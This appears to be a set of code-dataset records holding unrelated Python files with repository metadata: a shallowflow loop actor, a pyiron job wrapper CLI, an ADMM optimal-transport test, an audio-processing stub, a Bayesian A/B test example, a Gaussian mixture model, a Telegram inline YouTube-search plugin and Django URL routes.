def description(self):
"""
Returns a description for the actor.
:return: the actor description
:rtype: str
"""
return "Outputs an integer from the specified range."
def _define_options(self):
"""
For configuring the options.
"""
super()._define_options()
self._option_manager.add(Option(name="start", value_type=int, def_value=1,
help="The starting value"))
self._option_manager.add(Option(name="end", value_type=int, def_value=10,
help="The last value (incl)"))
self._option_manager.add(Option(name="step", value_type=int, def_value=1,
help="The increment between values"))
def _get_item_type(self):
"""
Returns the type of the individual items that get generated, when not outputting a list.
:return: the type that gets generated
"""
return int
def setup(self):
"""
Prepares the actor for use.
:return: None if successful, otherwise error message
:rtype: str
"""
result = super().setup()
if result is None:
if self.get("end") < self.get("start"):
result = "End value (%s) must be smaller than start (%d)!" % (self.get("end"), self.get("start"))
return result
def _do_execute(self):
"""
Performs the actual execution.
:return: None if successful, otherwise error message
:rtype: str
"""
i = self.get("start")
step = self.get("step")
end = self.get("end")
while i <= end:
self._output.append(i)
i += step
return None
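# --- Illustrative sketch (added; not part of the original module) ---
# Configuration check using only methods visible above (setup() and get());
# constructing ForLoop with no arguments and the surrounding flow wiring are
# assumptions about the shallowflow actor API.
def _forloop_defaults():
    loop = ForLoop()
    err = loop.setup()   # None unless end < start
    return err, loop.get("start"), loop.get("end"), loop.get("step")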
| 30.545455
| 113
| 0.556052
|
from shallowflow.api.source import AbstractListOutputSource
from shallowflow.api.config import Option
class ForLoop(AbstractListOutputSource):
def description(self):
return "Outputs an integer from the specified range."
def _define_options(self):
super()._define_options()
self._option_manager.add(Option(name="start", value_type=int, def_value=1,
help="The starting value"))
self._option_manager.add(Option(name="end", value_type=int, def_value=10,
help="The last value (incl)"))
self._option_manager.add(Option(name="step", value_type=int, def_value=1,
help="The increment between values"))
def _get_item_type(self):
return int
def setup(self):
result = super().setup()
if result is None:
if self.get("end") < self.get("start"):
result = "End value (%s) must be smaller than start (%d)!" % (self.get("end"), self.get("start"))
return result
def _do_execute(self):
i = self.get("start")
step = self.get("step")
end = self.get("end")
while i <= end:
self._output.append(i)
i += step
return None
| true
| true
|
790b2907d60dd24209ea9e5a733a1b821116b164
| 1,138
|
py
|
Python
|
pyiron/cli/wrapper.py
|
srmnitc/pyiron
|
ea290206292d60f5ad0a67b171a9f2f71f043264
|
[
"BSD-3-Clause"
] | null | null | null |
pyiron/cli/wrapper.py
|
srmnitc/pyiron
|
ea290206292d60f5ad0a67b171a9f2f71f043264
|
[
"BSD-3-Clause"
] | null | null | null |
pyiron/cli/wrapper.py
|
srmnitc/pyiron
|
ea290206292d60f5ad0a67b171a9f2f71f043264
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) Max-Planck-Institut für Eisenforschung GmbH - Computational Materials Design (CM) Department
# Distributed under the terms of "New BSD License", see the LICENSE file.
"""
Run a job from hdf5.
"""
from pyiron.base.job.wrapper import job_wrapper_function
def register(parser):
parser.add_argument(
"-d", "--debug", action = "store_true",
help = "enable debug mode" # TODO: what's that mean?
)
parser.add_argument(
"-j", "--job-id",
help = "job id to run"
)
parser.add_argument(
"-p", "--project",
help = "directory where the HDF5 file of the job is located"
)
parser.add_argument(
"-f", "--file-path",
help = "path to the HDF5 file"
)
parser.add_argument(
"-s", "--submit", action = "store_true",
help = "submit to queuing system on remote host"
)
def main(args):
job_wrapper_function(
working_directory=args.project,
job_id=args.job_id,
file_path=args.file_path,
debug=args.debug,
submit_on_remote=args.submit
)
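# --- Illustrative usage note (added; paths, the job id and the subcommand name are
# placeholders/assumptions about how this module is registered in the pyiron CLI) ---
#   pyiron wrapper -p /path/to/project -j 42
#   pyiron wrapper -p /path/to/project -f /path/to/project/job.h5 -j 42 --debug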
| 29.179487
| 108
| 0.593146
|
from pyiron.base.job.wrapper import job_wrapper_function
def register(parser):
parser.add_argument(
"-d", "--debug", action = "store_true",
help = "enable debug mode"
)
parser.add_argument(
"-j", "--job-id",
help = "job id to run"
)
parser.add_argument(
"-p", "--project",
help = "directory where the HDF5 file of the job is located"
)
parser.add_argument(
"-f", "--file-path",
help = "path to the HDF5 file"
)
parser.add_argument(
"-s", "--submit", action = "store_true",
help = "submit to queuing system on remote host"
)
def main(args):
job_wrapper_function(
working_directory=args.project,
job_id=args.job_id,
file_path=args.file_path,
debug=args.debug,
submit_on_remote=args.submit
)
| true
| true
|
790b295c1eca2286359672cb11eb653de59239b7
| 1,765
|
py
|
Python
|
test_ADMM.py
|
CrazyIvanPro/Optimal_Transport
|
aa782820a5ca5a01909ed3c32acbada43f6cfa0f
|
[
"MIT"
] | 2
|
2020-11-09T10:37:19.000Z
|
2021-07-06T09:24:30.000Z
|
test_ADMM.py
|
CrazyIvanPro/Optimal_Transport
|
aa782820a5ca5a01909ed3c32acbada43f6cfa0f
|
[
"MIT"
] | null | null | null |
test_ADMM.py
|
CrazyIvanPro/Optimal_Transport
|
aa782820a5ca5a01909ed3c32acbada43f6cfa0f
|
[
"MIT"
] | 1
|
2021-06-03T17:07:01.000Z
|
2021-06-03T17:07:01.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# =======================================
# File Name: test_ADMM.py
# Purpose : test ADMM solver for primal
# problem and dual problem
# =======================================
from utils import get_params
from ADMM_primal import ADMM_primal
from ADMM_dual import ADMM_dual
import numpy as np
import argparse
import time
import sys
"""Parser
"""
parser = argparse.ArgumentParser()
parser.add_argument('--n', type=int, default=64)
parser.add_argument('--dataset', type=str, choices=['random', 'caffarelli', 'ellipse', 'DOTmark'], default='random')
parser.add_argument('--imageclass', type=str, default='WhiteNoise')
parser.add_argument('--method', type=str, choices=['primal', 'dual'], default='primal')
parser.add_argument('--iters', type=int, default=10000)
parser.add_argument('--alpha', type=float, default=1.618)
parser.add_argument('--rho', type=float, default=1024)
args = parser.parse_args()
def main():
"""Main routine
"""
print("\nTesting ADMM")
print("====================")
print("m = n : ", args.n)
print("dataset: ", args.dataset)
if args.dataset == 'DOTmark':
print("class : ", args.imageclass)
print("method : ", args.method)
print("====================")
mu, nu, c = get_params(args.n, args.dataset, args.imageclass)
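    # Solve the discrete optimal-transport problem with the selected ADMM formulation and report the wall-clock time.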
start = time.time()
if args.method == 'primal':
ADMM_primal(mu, nu, c, args.iters, args.rho, args.alpha)
elif args.method == 'dual':
ADMM_dual(mu, nu, c, args.iters, args.rho, args.alpha)
t = time.time() - start
print('time = %.5e' % t)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print (" Ctrl+C pressed...")
sys.exit(1)
| 29.915254
| 116
| 0.5983
|
from utils import get_params
from ADMM_primal import ADMM_primal
from ADMM_dual import ADMM_dual
import numpy as np
import argparse
import time
import sys
parser = argparse.ArgumentParser()
parser.add_argument('--n', type=int, default=64)
parser.add_argument('--dataset', type=str, choices=['random', 'caffarelli', 'ellipse', 'DOTmark'], default='random')
parser.add_argument('--imageclass', type=str, default='WhiteNoise')
parser.add_argument('--method', type=str, choices=['primal', 'dual'], default='primal')
parser.add_argument('--iters', type=int, default=10000)
parser.add_argument('--alpha', type=float, default=1.618)
parser.add_argument('--rho', type=float, default=1024)
args = parser.parse_args()
def main():
print("\nTesting ADMM")
print("====================")
print("m = n : ", args.n)
print("dataset: ", args.dataset)
if args.dataset == 'DOTmark':
print("class : ", args.imageclass)
print("method : ", args.method)
print("====================")
mu, nu, c = get_params(args.n, args.dataset, args.imageclass)
start = time.time()
if args.method == 'primal':
ADMM_primal(mu, nu, c, args.iters, args.rho, args.alpha)
elif args.method == 'dual':
ADMM_dual(mu, nu, c, args.iters, args.rho, args.alpha)
t = time.time() - start
print('time = %.5e' % t)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print (" Ctrl+C pressed...")
sys.exit(1)
| true
| true
|
790b2982b23a530e0f088aaff3c4702dc9aa626c
| 2,407
|
py
|
Python
|
livius/audio/audioProcessing.py
|
papar22/livius
|
a28929ef27f9737a598bbae36360ebe7b55a3f41
|
[
"Unlicense"
] | 1
|
2018-05-08T20:04:08.000Z
|
2018-05-08T20:04:08.000Z
|
livius/audio/audioProcessing.py
|
raffienficiaud/livius
|
a28929ef27f9737a598bbae36360ebe7b55a3f41
|
[
"Unlicense"
] | null | null | null |
livius/audio/audioProcessing.py
|
raffienficiaud/livius
|
a28929ef27f9737a598bbae36360ebe7b55a3f41
|
[
"Unlicense"
] | null | null | null |
# Import Basic modules
import numpy as np
import os
# Import everything needed to edit video clips
from moviepy.editor import *
from moviepy.Clip import *
from moviepy.video.VideoClip import *
from moviepy.config import get_setting # ffmpeg, ffmpeg.exe, etc...
class AudioProcessing:
    # documentation string, which can be accessed via ClassName.__doc__ (AudioProcessing.__doc__)
    """ This class includes all required attributes and methods for slide detection.
    It includes different algorithms for slide detection such as Harris corner detection,
    Histogram thresholding, Hough Transform, sum of differences of all frames, etc.
The input of the functions is the input image/frame/video and the output is the four
coordinates of the position of the detected slide.
Built-In Class Attributes:
Every Python class keeps following built-in attributes and they can be accessed using
dot operator like any other attribute:
__dict__ : Dictionary containing the class's namespace.
__doc__ : Class documentation string or None if undefined.
__name__: Class name.
__module__: Module name in which the class is defined. This attribute is "__main__" in interactive mode.
__bases__ : A possibly empty tuple containing the base classes, in the order of their occurrence
in the base class list."""
def __init__(self, inputFile):
self.inputFile = inputFile
#def template_matching(self):
def equalizer(self):
'''
        This function serves for Harris Corner Detector
Inputs:
Outputs:
Example:
'''
def signal_improvement(self):
'''
This function serves for sum of the differences of all frames
Inputs:
Outputs:
Example:
'''
def audio_coding(self, bitrate, codecformat):
'''
This function serves for max of the differences of all frames
Inputs:
Outputs:
Example:
'''
def audio_clip(self):
'''
This function serves for max of all frames
Inputs:
Outputs:
Example:
'''
if __name__ == '__main__':
print "done"
| 20.57265
| 108
| 0.617366
|
import numpy as np
import os
from moviepy.editor import *
from moviepy.Clip import *
from moviepy.video.VideoClip import *
from moviepy.config import get_setting
class AudioProcessing:
""" This class include all required attributes and methods for slide detection.
It includes different algorithms for slide detection such as harris corner detection,
Histogram thresholding, Hough Transform, sum of differences of all frames and etc.
The input of the functions is the input image/frame/video and the output is the four
coordinates of the position of the detected slide.
Built-In Class Attributes:
Every Python class keeps following built-in attributes and they can be accessed using
dot operator like any other attribute:
__dict__ : Dictionary containing the class's namespace.
__doc__ : Class documentation string or None if undefined.
__name__: Class name.
__module__: Module name in which the class is defined. This attribute is "__main__" in interactive mode.
__bases__ : A possibly empty tuple containing the base classes, in the order of their occurrence
in the base class list."""
def __init__(self, inputFile):
self.inputFile = inputFile
#def template_matching(self):
def equalizer(self):
'''
        This function serves for Harris Corner Detector
Inputs:
Outputs:
Example:
'''
def signal_improvement(self):
'''
This function serves for sum of the differences of all frames
Inputs:
Outputs:
Example:
'''
def audio_coding(self, bitrate, codecformat):
'''
This function serves for max of the differences of all frames
Inputs:
Outputs:
Example:
'''
def audio_clip(self):
'''
This function serves for max of all frames
Inputs:
Outputs:
Example:
'''
if __name__ == '__main__':
print "done"
| false
| true
|
790b2c18fd1bc9773b6a57aed8716bfd86135e86
| 1,355
|
py
|
Python
|
code/examples/example_mikhail.py
|
hugopibernat/BayesianABTestAnalysis
|
026960524f5313f4a734f30fd447a5731be802e0
|
[
"Apache-2.0"
] | null | null | null |
code/examples/example_mikhail.py
|
hugopibernat/BayesianABTestAnalysis
|
026960524f5313f4a734f30fd447a5731be802e0
|
[
"Apache-2.0"
] | null | null | null |
code/examples/example_mikhail.py
|
hugopibernat/BayesianABTestAnalysis
|
026960524f5313f4a734f30fd447a5731be802e0
|
[
"Apache-2.0"
] | null | null | null |
from bayesianABTest import sampleSuccessRateForBinomial
from numpy import mean
def bestOfFive(A,B,C,D,E,F):
return mean( (A > B) & (A > C) & (A > D) & (A > E) & (A > F))
############# Example: Binomial Distribution #############
# Actual data for all cases
installs = [986,1013,959,968,1029,1014]
returns = [340,298,274,287,325,291]
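# Sample the posterior return rate of each variant from its install/return counts.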
A = sampleSuccessRateForBinomial(installs[0],returns[0])
B = sampleSuccessRateForBinomial(installs[1],returns[1])
C = sampleSuccessRateForBinomial(installs[2],returns[2])
D = sampleSuccessRateForBinomial(installs[3],returns[3])
E = sampleSuccessRateForBinomial(installs[4],returns[4])
F = sampleSuccessRateForBinomial(installs[5],returns[5])
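# Probability, estimated from the posterior samples, that each variant beats the other five.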
A_best = bestOfFive(A,B,C,D,E,F)
B_best = bestOfFive(B,A,C,D,E,F)
C_best = bestOfFive(C,B,A,D,E,F)
D_best = bestOfFive(D,B,C,A,E,F)
E_best = bestOfFive(E,B,C,D,A,F)
F_best = bestOfFive(F,B,C,D,E,A)
# Get samples from the posterior
print "The probability of 20 being the best choice is {}".format(A_best)
print "The probability of 21 being the best choice is {}".format(B_best)
print "The probability of 22 being the best choice is {}".format(C_best)
print "The probability of 23 being the best choice is {}".format(D_best)
print "The probability of 24 being the best choice is {}".format(E_best)
print "The probability of 25 being the best choice is {}".format(F_best)
| 38.714286
| 72
| 0.720295
|
from bayesianABTest import sampleSuccessRateForBinomial
from numpy import mean
def bestOfFive(A,B,C,D,E,F):
return mean( (A > B) & (A > C) & (A > D) & (A > E) & (A > F))
installs = [986,1013,959,968,1029,1014]
returns = [340,298,274,287,325,291]
A = sampleSuccessRateForBinomial(installs[0],returns[0])
B = sampleSuccessRateForBinomial(installs[1],returns[1])
C = sampleSuccessRateForBinomial(installs[2],returns[2])
D = sampleSuccessRateForBinomial(installs[3],returns[3])
E = sampleSuccessRateForBinomial(installs[4],returns[4])
F = sampleSuccessRateForBinomial(installs[5],returns[5])
A_best = bestOfFive(A,B,C,D,E,F)
B_best = bestOfFive(B,A,C,D,E,F)
C_best = bestOfFive(C,B,A,D,E,F)
D_best = bestOfFive(D,B,C,A,E,F)
E_best = bestOfFive(E,B,C,D,A,F)
F_best = bestOfFive(F,B,C,D,E,A)
print "The probability of 20 being the best choice is {}".format(A_best)
print "The probability of 21 being the best choice is {}".format(B_best)
print "The probability of 22 being the best choice is {}".format(C_best)
print "The probability of 23 being the best choice is {}".format(D_best)
print "The probability of 24 being the best choice is {}".format(E_best)
print "The probability of 25 being the best choice is {}".format(F_best)
| false
| true
|
790b2c72de1235c0ff977b57459bda4356b27913
| 5,790
|
py
|
Python
|
bananas/model.py
|
bccp/bananaplots
|
dbfe107207e07351c7d7125430fde16fb2731cc2
|
[
"Apache-2.0"
] | 1
|
2016-09-13T16:44:42.000Z
|
2016-09-13T16:44:42.000Z
|
bananas/model.py
|
bccp/bananaplots
|
dbfe107207e07351c7d7125430fde16fb2731cc2
|
[
"Apache-2.0"
] | 8
|
2016-08-24T22:56:35.000Z
|
2016-09-29T00:58:52.000Z
|
bananas/model.py
|
bccp/bananaplots
|
dbfe107207e07351c7d7125430fde16fb2731cc2
|
[
"Apache-2.0"
] | 1
|
2021-12-11T22:51:22.000Z
|
2021-12-11T22:51:22.000Z
|
import numpy
# FIXME: copy the functions here
from sklearn.mixture.gmm import log_multivariate_normal_density, logsumexp
def sample_gaussian2(means, cv, size, random_state, mins, maxes):
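    # Rejection-sample a multivariate normal, keeping only draws that fall inside the [mins, maxes] box.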
def once(size1):
g = random_state.multivariate_normal(means, cv, size1).T
g = g.reshape(len(means), -1)
mask = (g >= mins[:, None]).all(axis=0)
mask &= (g <= maxes[:, None]).all(axis=0)
return g[:, mask]
g = once(size)
generated = size
while g.shape[1] < size:
fac = 1.0 * g.shape[1] / size
togen = (size - g.shape[1]) * generated // g.shape[1]
g1 = once(togen)
generated = generated + togen
g = numpy.append(g, g1, axis=1)
return g[:, :size]
class GMM(object):
def __init__(self, weights, means, covs, lims):
self.weights = numpy.array(weights)
self.means = numpy.array(means)
self.covs = numpy.array(covs)
self.lims = numpy.array(lims)
[nc] = self.weights.shape
assert self.means.shape[0] == nc
[nc, nf] = self.means.shape
assert self.covs.shape[0] == nc
assert self.covs.shape[1] == nf
assert self.covs.shape[2] == nf
[nc, nf, nf] = self.covs.shape
assert self.lims.shape[0] == nf
assert self.lims.shape[1] == 2
def score(self, X, return_responsibilities=False):
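        # Log-density of X under the truncated Gaussian mixture; points outside the limits get -inf log-probability.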
nc = len(self.weights)
X = numpy.array(X)
if X.ndim == 1:
X = X[:, None]
if X.shape[1] != self.means.shape[1]:
raise ValueError('The shape of X is not compatible with self')
mins = self.lims[:, 0]
maxes = self.lims[:, 1]
lpr = numpy.log(self.weights) + \
log_multivariate_normal_density(X,
self.means,
self.covs, 'full')
mask = (X >= mins[None, :]).all(axis=-1)
mask &= (X <= maxes[None, :]).all(axis=-1)
logprob = logsumexp(lpr, axis=1)
logprob[~mask] = -numpy.inf
if return_responsibilities:
responsibilities = numpy.exp(lpr - logprob[:, None])
responsibilities[~mask] = 0
return logprob, responsibilities
return logprob
def marginalize(self, axes):
return GMM(self.weights, self.means[..., axes], self.covs[..., axes][..., axes, :], self.lims[axes])
def sample(self, size, random_state=None):
"""Generate random samples from the model.
Returns
-------
X : array_like, shape (n_samples, n_features)
List of samples
"""
if random_state is None:
random_state = numpy.random
mins = self.lims[:, 0]
maxes = self.lims[:, 1]
X = numpy.empty(size, ('f8', (self.means.shape[1],)))
# decide which component to use for each sample
comps = random_state.choice(len(self.weights), p=self.weights, size=size)
# for each component, generate all needed samples
for comp in range(len(self.weights)):
# occurrences of current component in X
comp_in_X = (comp == comps)
# number of those occurrences
num_comp_in_X = comp_in_X.sum()
if num_comp_in_X > 0:
cv = self.covs[comp]
g = sample_gaussian2(
self.means[comp], cv,
num_comp_in_X, random_state, mins, maxes).T
X[comp_in_X] = g
return X
@classmethod
def fit(kls, nc, X, lims):
# FIXME: get rid of this and add weights support
from sklearn import mixture
# XXX: Do not use DPGMM because the normalization is buggy
# https://github.com/scikit-learn/scikit-learn/issues/7371
model = mixture.GMM(nc, covariance_type='full', n_iter=1000)
model.fit(X)
if not model.converged_:
raise ValueError("Your data is strange. Gaussian mixture failed to converge")
return kls(model.weights_, model.means_, model.covars_, lims)
class Confidence(object):
def __init__(self, model, confidence_table):
self.model = model
self.confidence_table = confidence_table
def score(self, sc):
x, y = self.confidence_table
return numpy.interp(sc, x, y, left=1., right=0.)
@classmethod
def fit(kls, model, nsample=4*1024, vmin=-5, vmax=0, nb=100):
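        # Sample the model, then map log-density scores to confidence levels via percentiles of the sampled scores.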
X = model.sample(nsample)
sc = model.score(X)
confidence_levels = 1 - numpy.logspace(vmin, vmax, num=nb)
# FIXME: add weight support here
sc_cl = numpy.percentile(sc, 100. - confidence_levels * 100.)
confidence_table = numpy.array([sc_cl, confidence_levels])
return kls(model, confidence_table)
class CombinedModel(object):
def __init__(self, models):
self.models = models
def score(self, X):
return sum([model.score(X) for model in self.models])
def marginalize(self, axes):
return CombinedModel([
model.marginalize(axes) for model in self.models])
def sample(self, nsample, random_state=None):
if random_state is None:
random_state = numpy.random
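        # Rejection sampling: draw from the first model and keep each draw with probability given by the remaining models' combined density.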
def once(size):
X = self.models[0].sample(size, random_state)
nf = X.shape[-1]
lnprob = sum([model.score(X) for model in self.models[1:]])
prob = numpy.exp(lnprob)
prob /= prob.max()
keep = random_state.rand(len(X)) < prob
return X[keep].reshape(-1, nf)
g = once(nsample)
ng = nsample
while len(g) < nsample:
togen = (nsample - len(g)) * ng // len(g)
g1 = once(togen)
ng = ng + togen
g = numpy.append(g, g1, axis=0)
return g[:nsample]
| 33.859649
| 108
| 0.56943
|
import numpy
from sklearn.mixture.gmm import log_multivariate_normal_density, logsumexp
def sample_gaussian2(means, cv, size, random_state, mins, maxes):
def once(size1):
g = random_state.multivariate_normal(means, cv, size1).T
g = g.reshape(len(means), -1)
mask = (g >= mins[:, None]).all(axis=0)
mask &= (g <= maxes[:, None]).all(axis=0)
return g[:, mask]
g = once(size)
generated = size
while g.shape[1] < size:
fac = 1.0 * g.shape[1] / size
togen = (size - g.shape[1]) * generated // g.shape[1]
g1 = once(togen)
generated = generated + togen
g = numpy.append(g, g1, axis=1)
return g[:, :size]
class GMM(object):
def __init__(self, weights, means, covs, lims):
self.weights = numpy.array(weights)
self.means = numpy.array(means)
self.covs = numpy.array(covs)
self.lims = numpy.array(lims)
[nc] = self.weights.shape
assert self.means.shape[0] == nc
[nc, nf] = self.means.shape
assert self.covs.shape[0] == nc
assert self.covs.shape[1] == nf
assert self.covs.shape[2] == nf
[nc, nf, nf] = self.covs.shape
assert self.lims.shape[0] == nf
assert self.lims.shape[1] == 2
def score(self, X, return_responsibilities=False):
nc = len(self.weights)
X = numpy.array(X)
if X.ndim == 1:
X = X[:, None]
if X.shape[1] != self.means.shape[1]:
raise ValueError('The shape of X is not compatible with self')
mins = self.lims[:, 0]
maxes = self.lims[:, 1]
lpr = numpy.log(self.weights) + \
log_multivariate_normal_density(X,
self.means,
self.covs, 'full')
mask = (X >= mins[None, :]).all(axis=-1)
mask &= (X <= maxes[None, :]).all(axis=-1)
logprob = logsumexp(lpr, axis=1)
logprob[~mask] = -numpy.inf
if return_responsibilities:
responsibilities = numpy.exp(lpr - logprob[:, None])
responsibilities[~mask] = 0
return logprob, responsibilities
return logprob
def marginalize(self, axes):
return GMM(self.weights, self.means[..., axes], self.covs[..., axes][..., axes, :], self.lims[axes])
def sample(self, size, random_state=None):
if random_state is None:
random_state = numpy.random
mins = self.lims[:, 0]
maxes = self.lims[:, 1]
X = numpy.empty(size, ('f8', (self.means.shape[1],)))
comps = random_state.choice(len(self.weights), p=self.weights, size=size)
for comp in range(len(self.weights)):
comp_in_X = (comp == comps)
num_comp_in_X = comp_in_X.sum()
if num_comp_in_X > 0:
cv = self.covs[comp]
g = sample_gaussian2(
self.means[comp], cv,
num_comp_in_X, random_state, mins, maxes).T
X[comp_in_X] = g
return X
@classmethod
def fit(kls, nc, X, lims):
from sklearn import mixture
model = mixture.GMM(nc, covariance_type='full', n_iter=1000)
model.fit(X)
if not model.converged_:
raise ValueError("Your data is strange. Gaussian mixture failed to converge")
return kls(model.weights_, model.means_, model.covars_, lims)
class Confidence(object):
def __init__(self, model, confidence_table):
self.model = model
self.confidence_table = confidence_table
def score(self, sc):
x, y = self.confidence_table
return numpy.interp(sc, x, y, left=1., right=0.)
@classmethod
def fit(kls, model, nsample=4*1024, vmin=-5, vmax=0, nb=100):
X = model.sample(nsample)
sc = model.score(X)
confidence_levels = 1 - numpy.logspace(vmin, vmax, num=nb)
sc_cl = numpy.percentile(sc, 100. - confidence_levels * 100.)
confidence_table = numpy.array([sc_cl, confidence_levels])
return kls(model, confidence_table)
class CombinedModel(object):
def __init__(self, models):
self.models = models
def score(self, X):
return sum([model.score(X) for model in self.models])
def marginalize(self, axes):
return CombinedModel([
model.marginalize(axes) for model in self.models])
def sample(self, nsample, random_state=None):
if random_state is None:
random_state = numpy.random
def once(size):
X = self.models[0].sample(size, random_state)
nf = X.shape[-1]
lnprob = sum([model.score(X) for model in self.models[1:]])
prob = numpy.exp(lnprob)
prob /= prob.max()
keep = random_state.rand(len(X)) < prob
return X[keep].reshape(-1, nf)
g = once(nsample)
ng = nsample
while len(g) < nsample:
togen = (nsample - len(g)) * ng // len(g)
g1 = once(togen)
ng = ng + togen
g = numpy.append(g, g1, axis=0)
return g[:nsample]
| true
| true
|
790b2c91d5044689c187c8c0af450741d2838ee3
| 3,942
|
py
|
Python
|
plugins/inline.py
|
OxyNotOp/OxyPlayer
|
6747e1a20ad2c1ef54d461505a4f61a1e9f00e85
|
[
"MIT"
] | null | null | null |
plugins/inline.py
|
OxyNotOp/OxyPlayer
|
6747e1a20ad2c1ef54d461505a4f61a1e9f00e85
|
[
"MIT"
] | null | null | null |
plugins/inline.py
|
OxyNotOp/OxyPlayer
|
6747e1a20ad2c1ef54d461505a4f61a1e9f00e85
|
[
"MIT"
] | null | null | null |
#MIT License
#Copyright (c) 2021 OXYOP
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
from pyrogram.handlers import InlineQueryHandler
from youtubesearchpython import VideosSearch
from utils import USERNAME
from pyrogram.types import InlineQueryResultArticle, InputTextMessageContent, InlineKeyboardButton, InlineKeyboardMarkup
from pyrogram import Client, errors
from config import Config
REPLY_MESSAGE=Config.REPLY_MESSAGE
buttons = [
[
InlineKeyboardButton('⚡️Make Own Bot', url='https://heroku.com/deploy?template=https://github.com/OxyNotOp/OxyPlayer'),
InlineKeyboardButton('🧩 Source Code', url='https://github.com/OxyNotOp/OxyPlayer'),
],
[
InlineKeyboardButton('🎧Play Music', url=f'https://t.me/{USERNAME}'),
InlineKeyboardButton('👨🏼🦯 Help', callback_data='help')
]
]
@Client.on_inline_query()
async def search(client, query):
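    # Answer inline queries with YouTube search results; each chosen result sends a /play command for that video.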
answers = []
if query.query == "ORU_MANDAN_PM_VANNU":
answers.append(
InlineQueryResultArticle(
title="Deploy",
input_message_content=InputTextMessageContent(f"{REPLY_MESSAGE}\n\n<b>You can't use this bot in your group, for that you have to make your own bot from the [SOURCE CODE](https://github.com/OxyNotOp/OxyPlayer) below.</b>", disable_web_page_preview=True),
reply_markup=InlineKeyboardMarkup(buttons)
)
)
await query.answer(results=answers, cache_time=0)
return
string = query.query.lower().strip().rstrip()
if string == "":
await client.answer_inline_query(
query.id,
results=answers,
switch_pm_text=("Search a youtube video"),
switch_pm_parameter="help",
cache_time=0
)
else:
videosSearch = VideosSearch(string.lower(), limit=50)
for v in videosSearch.result()["result"]:
answers.append(
InlineQueryResultArticle(
title=v["title"],
description=("Duration: {} Views: {}").format(
v["duration"],
v["viewCount"]["short"]
),
input_message_content=InputTextMessageContent(
"/play https://www.youtube.com/watch?v={}".format(
v["id"]
)
),
thumb_url=v["thumbnails"][0]["url"]
)
)
try:
await query.answer(
results=answers,
cache_time=0
)
except errors.QueryIdInvalid:
await query.answer(
results=answers,
cache_time=0,
switch_pm_text=("Nothing found"),
switch_pm_parameter="",
)
__handlers__ = [
[
InlineQueryHandler(
search
)
]
]
| 39.42
| 269
| 0.624556
|
from pyrogram.handlers import InlineQueryHandler
from youtubesearchpython import VideosSearch
from utils import USERNAME
from pyrogram.types import InlineQueryResultArticle, InputTextMessageContent, InlineKeyboardButton, InlineKeyboardMarkup
from pyrogram import Client, errors
from config import Config
REPLY_MESSAGE=Config.REPLY_MESSAGE
buttons = [
[
InlineKeyboardButton('⚡️Make Own Bot', url='https://heroku.com/deploy?template=https://github.com/OxyNotOp/OxyPlayer'),
InlineKeyboardButton('🧩 Source Code', url='https://github.com/OxyNotOp/OxyPlayer'),
],
[
InlineKeyboardButton('🎧Play Music', url=f'https://t.me/{USERNAME}'),
InlineKeyboardButton('👨🏼🦯 Help', callback_data='help')
]
]
@Client.on_inline_query()
async def search(client, query):
answers = []
if query.query == "ORU_MANDAN_PM_VANNU":
answers.append(
InlineQueryResultArticle(
title="Deploy",
input_message_content=InputTextMessageContent(f"{REPLY_MESSAGE}\n\n<b>You can't use this bot in your group, for that you have to make your own bot from the [SOURCE CODE](https://github.com/OxyNotOp/OxyPlayer) below.</b>", disable_web_page_preview=True),
reply_markup=InlineKeyboardMarkup(buttons)
)
)
await query.answer(results=answers, cache_time=0)
return
string = query.query.lower().strip().rstrip()
if string == "":
await client.answer_inline_query(
query.id,
results=answers,
switch_pm_text=("Search a youtube video"),
switch_pm_parameter="help",
cache_time=0
)
else:
videosSearch = VideosSearch(string.lower(), limit=50)
for v in videosSearch.result()["result"]:
answers.append(
InlineQueryResultArticle(
title=v["title"],
description=("Duration: {} Views: {}").format(
v["duration"],
v["viewCount"]["short"]
),
input_message_content=InputTextMessageContent(
"/play https://www.youtube.com/watch?v={}".format(
v["id"]
)
),
thumb_url=v["thumbnails"][0]["url"]
)
)
try:
await query.answer(
results=answers,
cache_time=0
)
except errors.QueryIdInvalid:
await query.answer(
results=answers,
cache_time=0,
switch_pm_text=("Nothing found"),
switch_pm_parameter="",
)
__handlers__ = [
[
InlineQueryHandler(
search
)
]
]
| true
| true
|
790b2cc52380b3a8bf9200492b36ecac98c8f1d1
| 232
|
py
|
Python
|
project/apps/portfolio/urls.py
|
mahdimehrabi/django-portfolio-app
|
987bbfe6dce151f1b32e69ee833b71db636e933f
|
[
"MIT"
] | 4
|
2021-08-11T15:23:32.000Z
|
2021-12-31T02:55:33.000Z
|
project/apps/portfolio/urls.py
|
mahdimehrabi/django-portfolio-app
|
987bbfe6dce151f1b32e69ee833b71db636e933f
|
[
"MIT"
] | null | null | null |
project/apps/portfolio/urls.py
|
mahdimehrabi/django-portfolio-app
|
987bbfe6dce151f1b32e69ee833b71db636e933f
|
[
"MIT"
] | null | null | null |
from django.urls import path
from .views import Index, language_switch
app_name = 'portfolio'
urlpatterns = [
path('', Index.as_view(), name='index'),
path('switch-lang/<str:lang>/', language_switch, name='switch-lang'),
]
| 25.777778
| 73
| 0.698276
|
from django.urls import path
from .views import Index, language_switch
app_name = 'portfolio'
urlpatterns = [
path('', Index.as_view(), name='index'),
path('switch-lang/<str:lang>/', language_switch, name='switch-lang'),
]
| true
| true
|
790b2ce856eb1abe3a674d8d4c7412b9a9543a94
| 11,132
|
py
|
Python
|
